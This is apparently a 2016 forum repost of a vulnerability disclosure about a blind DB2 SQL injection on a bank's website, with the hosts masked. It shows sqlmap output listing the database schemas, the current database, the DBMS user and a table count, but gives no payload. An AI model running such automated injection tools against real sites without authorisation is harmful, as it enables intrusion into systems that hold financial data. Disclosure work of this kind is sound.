HanDs
Administrator

[July vulnerability disclosure] Boolean-based blind DB2 SQL injection through a pseudo-static URL on a bank's main site





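While learning, please comply with the relevant national laws and regulations; hackers do no evil. Without cybersecurity there is no national security.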


Details:

Please help review this one as well, thanks

http://**.**.**.**/bugs/wooyun-2016-0211479/trace/8722c6d1776df3a473e61e3dc44c12f9





http://**.**.**.**/Site/Home/CN








No WAF, so I ran sqlmap directly; the database was not dumped.

available databases [10]:
[*] DB2INST1
[*] NULLID
[*] SQLJ
[*] SYSCAT
[*] SYSFUN
[*] SYSIBM
[*] SYSIBMADM
[*] SYSPROC
[*] SYSSTAT
[*] SYSTOOLS

current database: 'CMSDB'

database management system users [1]:
[*] DB2INST1

Proof of vulnerability:

[313 tables]


Remediation:


Post #1
Posted: 2016-7-11   |   Views: 0   |   Replies: 0